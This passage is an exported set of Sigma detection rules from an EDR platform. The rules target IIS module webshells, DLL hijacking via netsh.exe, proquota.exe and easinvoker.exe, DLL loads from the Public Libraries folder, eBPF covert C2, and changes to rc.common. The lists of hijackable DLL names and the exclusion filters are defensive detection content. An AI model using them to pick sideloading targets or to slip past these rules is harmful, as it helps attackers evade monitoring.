Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n AgentVersion|lt|version: 4.3 # Before this version, only native DLL are considered, see 29dfc6e6-c42a-4009-8e21-367675f7e417\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - '?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - 
'?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - '?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - '?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: 
'?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_legitimate_nicelimited:\n - Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'NICE Systems Ltd'\n - Company: 'NICE Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately requires the loading of an unsigned library server-wide.\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6", + "rule_name": "Suspicious IIS Module Loaded", + "rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\nThis rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\n", + "rule_creation_date": "2023-11-20", + "rule_modified_date": "2025-10-09", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + 
"rule_technique_tags": [ + "attack.t1505.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0aede467-048c-4d8e-887a-5d4afe2b47d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.586945Z", + "creation_date": "2026-03-23T11:45:34.586949Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.586966Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_netsh.yml", + "content": "title: DLL Hijacking via netsh.exe\nid: 0aede467-048c-4d8e-887a-5d4afe2b47d8\ndescription: |\n Detects potential Windows DLL Hijacking via netsh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL 
within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netsh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\AUTHFWCFG.DLL'\n - '\\Cabinet.dll'\n - '\\CRYPTBASE.DLL'\n - '\\DHCPCMONITOR.DLL'\n - '\\dhcpcsvc6.DLL'\n - '\\dhcpcsvc.DLL'\n - '\\DNSAPI.dll'\n - '\\dot3api.dll'\n - '\\DOT3CFG.DLL'\n - '\\eappcfg.dll'\n - '\\eappprxy.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\FWCFG.DLL'\n - '\\FWPolicyIOMgr.dll'\n - '\\fwpuclnt.dll'\n - '\\HNETMON.DLL'\n - '\\HTTPAPI.dll'\n - '\\IFMON.DLL'\n - '\\IPHLPAPI.DLL'\n - '\\ktmw32.dll'\n - '\\mintdh.dll'\n - '\\MobileNetworking.dll'\n - '\\NDFAPI.DLL'\n - '\\NETIOHLP.DLL'\n - '\\netshell.dll'\n - '\\NETTRACE.DLL'\n - '\\nlaapi.dll'\n - '\\NSHHTTP.DLL'\n - '\\NSHIPSEC.DLL'\n - '\\NSHWFP.DLL'\n - '\\OneX.DLL'\n - '\\P2P.dll'\n - '\\P2PNETSH.DLL'\n - '\\PEERDISTSH.DLL'\n - '\\POLSTORE.DLL'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\RASMONTR.DLL'\n - '\\RMCLIENT.dll'\n - '\\RPCNSH.DLL'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\wcmapi.dll'\n - '\\WCNNETSH.DLL'\n - '\\wdi.dll'\n - '\\wevtapi.dll'\n - '\\WHHELPER.DLL'\n - '\\WINHTTP.dll'\n - '\\WINIPSEC.DLL'\n - '\\WINNSI.DLL'\n - '\\wlanapi.dll'\n - 
'\\WLANCFG.DLL'\n - '\\WSHELPER.DLL'\n - '\\WWANCFG.DLL'\n - '\\wwapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0aede467-048c-4d8e-887a-5d4afe2b47d8", + "rule_name": "DLL Hijacking via netsh.exe", + "rule_description": "Detects potential Windows DLL Hijacking via netsh.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.079690Z", + "creation_date": "2026-03-23T11:45:34.079692Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.079697Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://blog.talosintelligence.com/mustang-panda-targets-europe/", + "https://attack.mitre.org/techniques/T1036/005/" + ], + "name": "t1036_005_dll_load_from_user_public_libraries.yml", + "content": "title: DLL Loaded from Libraries Folder\nid: 0b84fa6b-6d3b-4041-972c-ee8b193fa745\ndescription: |\n Detects the suspicious loading of a DLL from the libraries folder of the Public user.\n This folder is an uncommon directory for a DLL to load from and is often abused by attackers.\n It is recommended to analyze the loaded DLL to look for malicious behavior or content.\nreferences:\n - https://blog.talosintelligence.com/mustang-panda-targets-europe/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/03/06\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\Users\\Public\\Libraries\\'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + 
"rule_level_override": null, + "rule_id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745", + "rule_name": "DLL Loaded from Libraries Folder", + "rule_description": "Detects the suspicious loading of a DLL from the libraries folder of the Public user.\nThis folder is an uncommon directory for a DLL to load from and is often abused by attackers.\nIt is recommended to analyze the loaded DLL to look for malicious behavior or content.\n", + "rule_creation_date": "2024-03-06", + "rule_modified_date": "2025-01-29", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1036.005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0b99a008-58ed-40da-bc7d-43120837aaaf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.620148Z", + "creation_date": "2026-03-23T11:45:34.620150Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.620154Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf", + 
"https://redcanary.com/blog/threat-detection/ebpf-malware/", + "https://github.com/h3xduck/TripleCross", + "https://attack.mitre.org/techniques/T1205/002/" + ], + "name": "t1205_002_possible_ebpf_covert_c2.yml", + "content": "title: Possible Extended BPF Covert C2\nid: 0b99a008-58ed-40da-bc7d-43120837aaaf\ndescription: |\n Detects a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program loaded.\n A malware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\n When a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\n A TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\n Together, these components create a covert communication channel without generating visible network activity.\n It is recommended to check the process which loaded the eBPF program for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://redcanary.com/blog/threat-detection/ebpf-malware/\n - https://github.com/h3xduck/TripleCross\n - https://attack.mitre.org/techniques/T1205/002/\ndate: 2025/11/13\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.002\n - attack.t1205.001\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_load'\n ProgramTypeStr:\n - 'BPF_PROG_TYPE_XDP'\n - 'BPF_PROG_TYPE_SCHED_CLS'\n Image: '*'\n\n filter_containers:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim'\n - '|/usr/libexec/crio/conmon'\n - '|/usr/bin/containerd'\n - '|/usr/bin/lxc-start'\n\n filter_edr:\n Image:\n - 
'/opt/hurukai-agent/bin/hurukai'\n - '/opt/CrowdStrike/falcon-sensor-bpf*'\n\n filter_cilium:\n Image: '/usr/bin/cilium-agent'\n\n filter_network_tools:\n Image:\n - '*/*bin/kxdpgun'\n - '*/bin/netbird'\n - '*/*bin/xdp-dns'\n - '*/bin/tc'\n\n filter_bpf_tools:\n Image: '*/bin/bpftool'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0b99a008-58ed-40da-bc7d-43120837aaaf", + "rule_name": "Possible Extended BPF Covert C2", + "rule_description": "Detects a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program loaded.\nA malware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\nWhen a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\nA TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\nTogether, these components create a covert communication channel without generating visible network activity.\nIt is recommended to check the process which loaded the eBPF program for suspicious activities.\n", + "rule_creation_date": "2025-11-13", + "rule_modified_date": "2026-01-22", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1205.001", + "attack.t1205.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.600433Z", + "creation_date": "2026-03-23T11:45:34.600436Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.600444Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_proquota.yml", + "content": "title: DLL Hijacking via proquota.exe\nid: 0b9f13f2-fe2b-43fe-9f82-22ab533221ff\ndescription: |\n Detects potential Windows DLL Hijacking via proquota.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 
classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'proquota.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff", + "rule_name": "DLL Hijacking via proquota.exe", + "rule_description": "Detects potential Windows DLL Hijacking via proquota.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0baf276d-d629-4eb2-948c-1b0f87b13160", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.590863Z", + "creation_date": "2026-03-23T11:45:34.590867Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.590901Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_easinvoker.yml", + "content": "title: DLL Hijacking via easinvoker.exe\nid: 0baf276d-d629-4eb2-948c-1b0f87b13160\ndescription: |\n Detects potential Windows DLL Hijacking via easinvoker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - 
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easinvoker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0baf276d-d629-4eb2-948c-1b0f87b13160", + "rule_name": "DLL Hijacking via easinvoker.exe", + "rule_description": "Detects potential Windows DLL Hijacking via easinvoker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": 
"2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.612097Z", + "creation_date": "2026-03-23T11:45:34.612101Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612108Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon", + "https://attack.mitre.org/techniques/T1037/004/" + ], + "name": "t1037_004_rc_common_modified_linux.yml", + "content": "title: RC Script /etc/rc.common Modified\nid: 0bc4d271-7029-4c83-bad4-a9ea34b7213b\ndescription: |\n Detects an attempt to modify the RC script /etc/rc.common.\n The /etc/rc.common file is a script that is used to perform system-level tasks during the 
